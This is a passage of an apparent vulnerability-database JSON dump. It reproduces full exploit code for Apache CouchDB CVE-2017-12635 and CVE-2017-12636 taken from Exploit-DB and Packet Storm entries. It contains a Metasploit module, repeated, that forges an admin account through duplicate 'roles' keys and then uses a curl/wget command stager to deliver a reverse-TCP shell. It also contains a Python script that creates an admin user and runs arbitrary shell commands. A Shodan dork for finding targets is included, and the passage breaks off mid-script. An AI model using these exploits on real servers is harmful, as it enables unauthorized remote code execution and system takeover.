'linux/x64/shell_reverse_tcp',\r\n 'CMDSTAGER::FLAVOR' => 'curl'\r\n },\r\n 'CmdStagerFlavor' => ['curl', 'wget'],\r\n 'Targets' => [\r\n ['Automatic', {}],\r\n ['Apache CouchDB version 1.x', {}],\r\n ['Apache CouchDB version 2.x', {}]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(5984),\r\n OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. (default is random)']),\r\n OptString.new('HttpUsername', [false, 'The username to login as']),\r\n OptString.new('HttpPassword', [false, 'The password to login with'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']),\r\n OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp'])\r\n ])\r\n end\r\n\r\n def check\r\n get_version\r\n version = Gem::Version.new(@version)\r\n return CheckCode::Unknown if version.version.empty?\r\n vprint_status \"Found CouchDB version #{version}\"\r\n\r\n return CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n fail_with(Failure::Unknown, \"Something went horribly wrong and we couldn't continue to exploit.\") unless get_version\r\n version = @version\r\n\r\n vprint_good(\"#{peer} - Authorization bypass successful\") if auth_bypass\r\n\r\n print_status(\"Generating #{datastore['CMDSTAGER::FLAVOR']} command stager\")\r\n @cmdstager = generate_cmdstager(\r\n temp: datastore['WritableDir'],\r\n file: File.basename(cmdstager_path)\r\n ).join(';')\r\n\r\n register_file_for_cleanup(cmdstager_path)\r\n\r\n if !datastore['Attempts'] || datastore['Attempts'] <= 0\r\n attempts = 1\r\n else\r\n attempts = datastore['Attempts']\r\n end\r\n\r\n attempts.times do |i|\r\n print_status(\"#{peer} - The #{i + 1} time to exploit\")\r\n send_payload(version)\r\n Rex.sleep(5)\r\n # break 
if we get the shell\r\n break if session_created?\r\n end\r\n end\r\n\r\n # CVE-2017-12635\r\n # The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON,\r\n # the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization\r\n # for the newly created user.\r\n def auth_bypass\r\n username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12)\r\n password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12)\r\n @auth = basic_auth(username, password)\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_users/org.couchdb.user:#{username}\"),\r\n 'method' => 'PUT',\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"type\": \"user\",\"name\": \"#{username}\",\"roles\": [\"_admin\"],\"roles\": [],\"password\": \"#{password}\"})\r\n )\r\n\r\n if res && (res.code == 200 || res.code == 201) && res.get_json_document['ok']\r\n return true\r\n else\r\n return false\r\n end\r\n end\r\n\r\n def get_version\r\n @version = nil\r\n\r\n begin\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'method' => 'GET',\r\n 'authorization' => @auth\r\n )\r\n rescue Rex::ConnectionError\r\n vprint_bad(\"#{peer} - Connection failed\")\r\n return false\r\n end\r\n\r\n unless res\r\n vprint_bad(\"#{peer} - No response, check if it is CouchDB. 
\")\r\n return false\r\n end\r\n\r\n if res && res.code == 401\r\n print_bad(\"#{peer} - Authentication required.\")\r\n return false\r\n end\r\n\r\n if res && res.code == 200\r\n res_json = res.get_json_document\r\n\r\n if res_json.empty?\r\n vprint_bad(\"#{peer} - Cannot parse the response, seems like it's not CouchDB.\")\r\n return false\r\n end\r\n\r\n @version = res_json['version'] if res_json['version']\r\n return true\r\n end\r\n\r\n vprint_warning(\"#{peer} - Version not found\")\r\n return true\r\n end\r\n\r\n def send_payload(version)\r\n vprint_status(\"#{peer} - CouchDB version is #{version}\") if version\r\n\r\n version = Gem::Version.new(@version)\r\n if version.version.empty?\r\n vprint_warning(\"#{peer} - Cannot retrieve the version of CouchDB.\")\r\n # if target set Automatic, exploit failed.\r\n if target == targets[0]\r\n fail_with(Failure::NoTarget, \"#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.\")\r\n elsif target == targets[1]\r\n payload1\r\n elsif target == targets[2]\r\n payload2\r\n end\r\n elsif version < Gem::Version.new('1.7.0')\r\n payload1\r\n elsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))\r\n payload2\r\n elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')\r\n fail_with(Failure::NotVulnerable, \"#{peer} - The target is not vulnerable.\")\r\n end\r\n end\r\n\r\n # Exploit with multi requests\r\n # payload1 is for the version of couchdb below 1.7.0\r\n def payload1\r\n rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_db = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_doc = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_hex = Rex::Text.rand_text_hex(32)\r\n rand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\"\r\n\r\n register_file_for_cleanup(rand_file)\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 
\"/_config/query_servers/#{rand_cmd1}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %({\"_id\": \"#{rand_hex}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"),\r\n 'method' => 'POST',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"language\":\"#{rand_cmd1}\",\"map\":\"\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd2}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"/bin/sh #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"),\r\n 'method' => 'POST',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"language\":\"#{rand_cmd2}\",\"map\":\"\"})\r\n )\r\n end\r\n\r\n # payload2 is for the version of couchdb below 2.1.1\r\n def payload2\r\n rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_db = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_doc = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_tmp = Rex::Text.rand_text_alpha_lower(4..12)\r\n rand_hex = Rex::Text.rand_text_hex(32)\r\n rand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\"\r\n\r\n register_file_for_cleanup(rand_file)\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_membership\"),\r\n 'method' => 'GET',\r\n 'authorization' => @auth\r\n )\r\n\r\n node = res.get_json_document['all_nodes'][0]\r\n\r\n 
send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd1}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %({\"_id\": \"#{rand_hex}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd1}\"})\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd2}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'data' => %(\"/bin/sh #{rand_file}\")\r\n )\r\n\r\n send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"),\r\n 'method' => 'PUT',\r\n 'authorization' => @auth,\r\n 'ctype' => 'application/json',\r\n 'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd2}\"})\r\n )\r\n end\r\n\r\n def cmdstager_path\r\n @cmdstager_path ||=\r\n \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}\"\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/45019/"}, {"lastseen": "2018-06-20T12:45:35", "bulletinFamily": "exploit", "description": "Apache CouchDB < 2.1.0 - Remote Code Execution. CVE-2017-12636. 
Webapps exploit for Linux platform", "modified": "2018-06-20T00:00:00", "published": "2018-06-20T00:00:00", "id": "EDB-ID:44913", "href": "https://www.exploit-db.com/exploits/44913/", "type": "exploitdb", "title": "Apache CouchDB < 2.1.0 - Remote Code Execution", "sourceData": "# Title: Apache CouchDB < 2.1.0 - Remote Code Execution\r\n# Author: Cody Zacharias\r\n# Shodan Dork: port:5984\r\n# Vendor Homepage: http://couchdb.apache.org/\r\n# Software Link: http://archive.apache.org/dist/couchdb/source/1.6.0/\r\n# Version: <= 1.7.0 and 2.x - 2.1.0\r\n# Tested on: Debian\r\n# CVE : CVE-2017-12636\r\n# References: \r\n# https://justi.cz/security/2017/11/14/couchdb-rce-npm.html\r\n# https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apache-couchdb-open-door-monero-miners/\r\n\r\n# Proof of Concept: python exploit.py --priv -c \"id\" http://localhost:5984\r\n\r\n#!/usr/bin/env python\r\nfrom requests.auth import HTTPBasicAuth\r\nimport argparse\r\nimport requests\r\nimport re\r\nimport sys\r\n\r\ndef getVersion():\r\n version = requests.get(args.host).json()[\"version\"]\r\n return version\r\n\r\ndef error(message):\r\n print(message)\r\n sys.exit(1)\r\n\r\ndef exploit(version):\r\n with requests.session() as session:\r\n session.headers = {\"Content-Type\": \"application/json\"}\r\n\r\n # Exploit privilege escalation\r\n if args.priv:\r\n try:\r\n payload = '{\"type\": \"user\", \"name\": \"'\r\n payload += args.user\r\n payload += '\", \"roles\": [\"_admin\"], \"roles\": [],'\r\n payload += '\"password\": \"' + args.password + '\"}'\r\n\r\n pr = session.put(args.host + \"/_users/org.couchdb.user:\" + args.user,\r\n data=payload)\r\n\r\n print(\"[+] User \" + args.user + \" with password \" + args.password + \" successfully created.\")\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to create the user on remote host.\")\r\n\r\n session.auth = HTTPBasicAuth(args.user, args.password)\r\n\r\n # Create payload\r\n try:\r\n if 
version == 1:\r\n session.put(args.host + \"/_config/query_servers/cmd\",\r\n data='\"' + args.cmd + '\"')\r\n print(\"[+] Created payload at: \" + args.host + \"/_config/query_servers/cmd\")\r\n else:\r\n host = session.get(args.host + \"/_membership\").json()[\"all_nodes\"][0]\r\n session.put(args.host + \"/_node/\" + host + \"/_config/query_servers/cmd\",\r\n data='\"' + args.cmd + '\"')\r\n print(\"[+] Created payload at: \" + args.host + \"/_node/\" + host + \"/_config/query_servers/cmd\")\r\n except requests.exceptions.HTTPError as e:\r\n error(\"[-] Unable to create command payload: \" + e)\r\n\r\n try:\r\n session.put(args.host + \"/god\")\r\n session.put(args.host + \"/god/zero\", data='{\"_id\": \"HTP\"}')\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to create database.\")\r\n\r\n # Execute payload\r\n try:\r\n if version == 1:\r\n session.post(args.host + \"/god/_temp_view?limit=10\",\r\n data='{\"language\": \"cmd\", \"map\": \"\"}')\r\n else:\r\n session.post(args.host + \"/god/_design/zero\",\r\n data='{\"_id\": \"_design/zero\", \"views\": {\"god\": {\"map\": \"\"} }, \"language\": \"cmd\"}')\r\n print(\"[+] Command executed: \" + args.cmd)\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to execute payload.\")\r\n\r\n print(\"[*] Cleaning up.\")\r\n\r\n # Cleanup database\r\n try:\r\n session.delete(args.host + \"/god\")\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to remove database.\")\r\n\r\n # Cleanup payload\r\n try:\r\n if version == 1:\r\n session.delete(args.host + \"/_config/query_servers/cmd\")\r\n else:\r\n host = session.get(args.host + \"/_membership\").json()[\"all_nodes\"][0]\r\n session.delete(args.host + \"/_node\" + host + \"/_config/query_servers/cmd\")\r\n except requests.exceptions.HTTPError:\r\n error(\"[-] Unable to remove payload.\")\r\n\r\ndef main():\r\n version = getVersion()\r\n print(\"[*] Detected CouchDB Version \" + version)\r\n vv = version.replace(\".\", 
\"\")\r\n v = int(version[0])\r\n if v == 1 and int(vv) <= 170:\r\n exploit(v)\r\n elif v == 2 and int(vv) < 211:\r\n exploit(v)\r\n else:\r\n print(\"[-] Version \" + version + \" not vulnerable.\")\r\n sys.exit(0)\r\n\r\nif __name__ == \"__main__\":\r\n ap = argparse.ArgumentParser(\r\n description=\"Apache CouchDB JSON Remote Code Execution Exploit (CVE-2017-12636)\")\r\n ap.add_argument(\"host\", help=\"URL (Example: http://127.0.0.1:5984).\")\r\n ap.add_argument(\"-c\", \"--cmd\", help=\"Command to run.\")\r\n ap.add_argument(\"--priv\", help=\"Exploit privilege escalation (CVE-2017-12635).\",\r\n action=\"store_true\")\r\n ap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: guest).\",\r\n default=\"guest\")\r\n ap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: guest).\",\r\n default=\"guest\")\r\n args = ap.parse_args()\r\n main()", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44913/"}], "packetstorm": [{"lastseen": "2018-07-13T01:33:32", "bulletinFamily": "exploit", "description": "", "modified": "2018-07-12T00:00:00", "published": "2018-07-12T00:00:00", "id": "PACKETSTORM:148535", "href": "https://packetstormsecurity.com/files/148535/Apache-CouchDB-Arbitrary-Command-Execution.html", "title": "Apache CouchDB Arbitrary Command Execution", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache CouchDB Arbitrary Command Execution', \n'Description' => %q{ \nCouchDB administrative users can configure the database server via 
HTTP(S). \nSome of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. \nThis allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user, \nincluding downloading and executing scripts from the public internet. \n}, \n'Author' => [ \n'Max Justicz', # CVE-2017-12635 Vulnerability discovery \n'Joan Touzet', # CVE-2017-12636 Vulnerability discovery \n'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module \n], \n'References' => [ \n['CVE', '2017-12636'], \n['CVE', '2017-12635'], \n['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'], \n['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'], \n['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E'] \n], \n'DisclosureDate' => 'Apr 6 2016', \n'License' => MSF_LICENSE, \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/shell_reverse_tcp', \n'CMDSTAGER::FLAVOR' => 'curl' \n}, \n'CmdStagerFlavor' => ['curl', 'wget'], \n'Targets' => [ \n['Automatic', {}], \n['Apache CouchDB version 1.x', {}], \n['Apache CouchDB version 2.x', {}] \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options([ \nOpt::RPORT(5984), \nOptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. 
(default is random)']), \nOptString.new('HttpUsername', [false, 'The username to login as']), \nOptString.new('HttpPassword', [false, 'The password to login with']) \n]) \n \nregister_advanced_options([ \nOptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']), \nOptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp']) \n]) \nend \n \ndef check \nget_version \nversion = Gem::Version.new(@version) \nreturn CheckCode::Unknown if version.version.empty? \nvprint_status \"Found CouchDB version #{version}\" \n \nreturn CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0')) \n \nCheckCode::Safe \nend \n \ndef exploit \nfail_with(Failure::Unknown, \"Something went horribly wrong and we couldn't continue to exploit.\") unless get_version \nversion = @version \n \nvprint_good(\"#{peer} - Authorization bypass successful\") if auth_bypass \n \nprint_status(\"Generating #{datastore['CMDSTAGER::FLAVOR']} command stager\") \n@cmdstager = generate_cmdstager( \ntemp: datastore['WritableDir'], \nfile: File.basename(cmdstager_path) \n).join(';') \n \nregister_file_for_cleanup(cmdstager_path) \n \nif !datastore['Attempts'] || datastore['Attempts'] <= 0 \nattempts = 1 \nelse \nattempts = datastore['Attempts'] \nend \n \nattempts.times do |i| \nprint_status(\"#{peer} - The #{i + 1} time to exploit\") \nsend_payload(version) \nRex.sleep(5) \n# break if we get the shell \nbreak if session_created? \nend \nend \n \n# CVE-2017-12635 \n# The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, \n# the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization \n# for the newly created user. 
\ndef auth_bypass \nusername = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12) \npassword = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12) \n@auth = basic_auth(username, password) \n \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_users/org.couchdb.user:#{username}\"), \n'method' => 'PUT', \n'ctype' => 'application/json', \n'data' => %({\"type\": \"user\",\"name\": \"#{username}\",\"roles\": [\"_admin\"],\"roles\": [],\"password\": \"#{password}\"}) \n) \n \nif res && (res.code == 200 || res.code == 201) && res.get_json_document['ok'] \nreturn true \nelse \nreturn false \nend \nend \n \ndef get_version \n@version = nil \n \nbegin \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path), \n'method' => 'GET', \n'authorization' => @auth \n) \nrescue Rex::ConnectionError \nvprint_bad(\"#{peer} - Connection failed\") \nreturn false \nend \n \nunless res \nvprint_bad(\"#{peer} - No response, check if it is CouchDB. \") \nreturn false \nend \n \nif res && res.code == 401 \nprint_bad(\"#{peer} - Authentication required.\") \nreturn false \nend \n \nif res && res.code == 200 \nres_json = res.get_json_document \n \nif res_json.empty? \nvprint_bad(\"#{peer} - Cannot parse the response, seems like it's not CouchDB.\") \nreturn false \nend \n \n@version = res_json['version'] if res_json['version'] \nreturn true \nend \n \nvprint_warning(\"#{peer} - Version not found\") \nreturn true \nend \n \ndef send_payload(version) \nvprint_status(\"#{peer} - CouchDB version is #{version}\") if version \n \nversion = Gem::Version.new(@version) \nif version.version.empty? \nvprint_warning(\"#{peer} - Cannot retrieve the version of CouchDB.\") \n# if target set Automatic, exploit failed. 
\nif target == targets[0] \nfail_with(Failure::NoTarget, \"#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.\") \nelsif target == targets[1] \npayload1 \nelsif target == targets[2] \npayload2 \nend \nelsif version < Gem::Version.new('1.7.0') \npayload1 \nelsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0')) \npayload2 \nelsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0') \nfail_with(Failure::NotVulnerable, \"#{peer} - The target is not vulnerable.\") \nend \nend \n \n# Exploit with multi requests \n# payload1 is for the version of couchdb below 1.7.0 \ndef payload1 \nrand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12) \nrand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12) \nrand_db = Rex::Text.rand_text_alpha_lower(4..12) \nrand_doc = Rex::Text.rand_text_alpha_lower(4..12) \nrand_hex = Rex::Text.rand_text_hex(32) \nrand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\" \n \nregister_file_for_cleanup(rand_file) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd1}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\") \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"), \n'method' => 'PUT', \n'authorization' => @auth \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'data' => %({\"_id\": \"#{rand_hex}\"}) \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"), \n'method' => 'POST', \n'authorization' => @auth, \n'ctype' => 'application/json', \n'data' => %({\"language\":\"#{rand_cmd1}\",\"map\":\"\"}) \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd2}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'data' => 
%(\"/bin/sh #{rand_file}\") \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"), \n'method' => 'POST', \n'authorization' => @auth, \n'ctype' => 'application/json', \n'data' => %({\"language\":\"#{rand_cmd2}\",\"map\":\"\"}) \n) \nend \n \n# payload2 is for the version of couchdb below 2.1.1 \ndef payload2 \nrand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12) \nrand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12) \nrand_db = Rex::Text.rand_text_alpha_lower(4..12) \nrand_doc = Rex::Text.rand_text_alpha_lower(4..12) \nrand_tmp = Rex::Text.rand_text_alpha_lower(4..12) \nrand_hex = Rex::Text.rand_text_hex(32) \nrand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\" \n \nregister_file_for_cleanup(rand_file) \n \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_membership\"), \n'method' => 'GET', \n'authorization' => @auth \n) \n \nnode = res.get_json_document['all_nodes'][0] \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd1}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\") \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"), \n'method' => 'PUT', \n'authorization' => @auth \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'data' => %({\"_id\": \"#{rand_hex}\"}) \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'ctype' => 'application/json', \n'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd1}\"}) \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd2}\"), \n'method' => 'PUT', 
\n'authorization' => @auth, \n'data' => %(\"/bin/sh #{rand_file}\") \n) \n \nsend_request_cgi( \n'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"), \n'method' => 'PUT', \n'authorization' => @auth, \n'ctype' => 'application/json', \n'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd2}\"}) \n) \nend \n \ndef cmdstager_path \n@cmdstager_path ||= \n\"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}\" \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148535/apache_couchdb_cmd_exec.rb.txt"}, {"lastseen": "2018-06-23T09:28:55", "bulletinFamily": "exploit", "description": "", "modified": "2018-06-21T00:00:00", "published": "2018-06-21T00:00:00", "id": "PACKETSTORM:148273", "href": "https://packetstormsecurity.com/files/148273/Apache-CouchDB-Remote-Code-Execution.html", "title": "Apache CouchDB Remote Code Execution", "type": "packetstorm", "sourceData": "`# Title: Apache CouchDB < 2.1.0 - Remote Code Execution \n# Author: Cody Zacharias \n# Shodan Dork: port:5984 \n# Vendor Homepage: http://couchdb.apache.org/ \n# Software Link: http://archive.apache.org/dist/couchdb/source/1.6.0/ \n# Version: <= 1.7.0 and 2.x - 2.1.0 \n# Tested on: Debian \n# CVE : CVE-2017-12636 \n# References: \n# https://justi.cz/security/2017/11/14/couchdb-rce-npm.html \n# https://blog.trendmicro.com/trendlabs-security-intelligence/vulnerabilities-apache-couchdb-open-door-monero-miners/ \n \n# Proof of Concept: python exploit.py --priv -c \"id\" http://localhost:5984 \n \n#!/usr/bin/env python \nfrom requests.auth import HTTPBasicAuth \nimport argparse \nimport requests \nimport re \nimport sys \n \ndef getVersion(): \nversion = requests.get(args.host).json()[\"version\"] \nreturn version \n \ndef error(message): \nprint(message) \nsys.exit(1) \n \ndef 
exploit(version): \nwith requests.session() as session: \nsession.headers = {\"Content-Type\": \"application/json\"} \n \n# Exploit privilege escalation \nif args.priv: \ntry: \npayload = '{\"type\": \"user\", \"name\": \"' \npayload += args.user \npayload += '\", \"roles\": [\"_admin\"], \"roles\": [],' \npayload += '\"password\": \"' + args.password + '\"}' \n \npr = session.put(args.host + \"/_users/org.couchdb.user:\" + args.user, \ndata=payload) \n \nprint(\"[+] User \" + args.user + \" with password \" + args.password + \" successfully created.\") \nexcept requests.exceptions.HTTPError: \nerror(\"[-] Unable to create the user on remote host.\") \n \nsession.auth = HTTPBasicAuth(args.user, args.password) \n \n# Create payload \ntry: \nif version == 1: \nsession.put(args.host + \"/_config/query_servers/cmd\", \ndata='\"' + args.cmd + '\"') \nprint(\"[+] Created payload at: \" + args.host + \"/_config/query_servers/cmd\") \nelse: \nhost = session.get(args.host + \"/_membership\").json()[\"all_nodes\"][0] \nsession.put(args.host + \"/_node/\" + host + \"/_config/query_servers/cmd\", \ndata='\"' + args.cmd + '\"') \nprint(\"[+] Created payload at: \" + args.host + \"/_node/\" + host + \"/_config/query_servers/cmd\") \nexcept requests.exceptions.HTTPError as e: \nerror(\"[-] Unable to create command payload: \" + e) \n \ntry: \nsession.put(args.host + \"/god\") \nsession.put(args.host + \"/god/zero\", data='{\"_id\": \"HTP\"}') \nexcept requests.exceptions.HTTPError: \nerror(\"[-] Unable to create database.\") \n \n# Execute payload \ntry: \nif version == 1: \nsession.post(args.host + \"/god/_temp_view?limit=10\", \ndata='{\"language\": \"cmd\", \"map\": \"\"}') \nelse: \nsession.post(args.host + \"/god/_design/zero\", \ndata='{\"_id\": \"_design/zero\", \"views\": {\"god\": {\"map\": \"\"} }, \"language\": \"cmd\"}') \nprint(\"[+] Command executed: \" + args.cmd) \nexcept requests.exceptions.HTTPError: \nerror(\"[-] Unable to execute payload.\") \n \nprint(\"[*] 
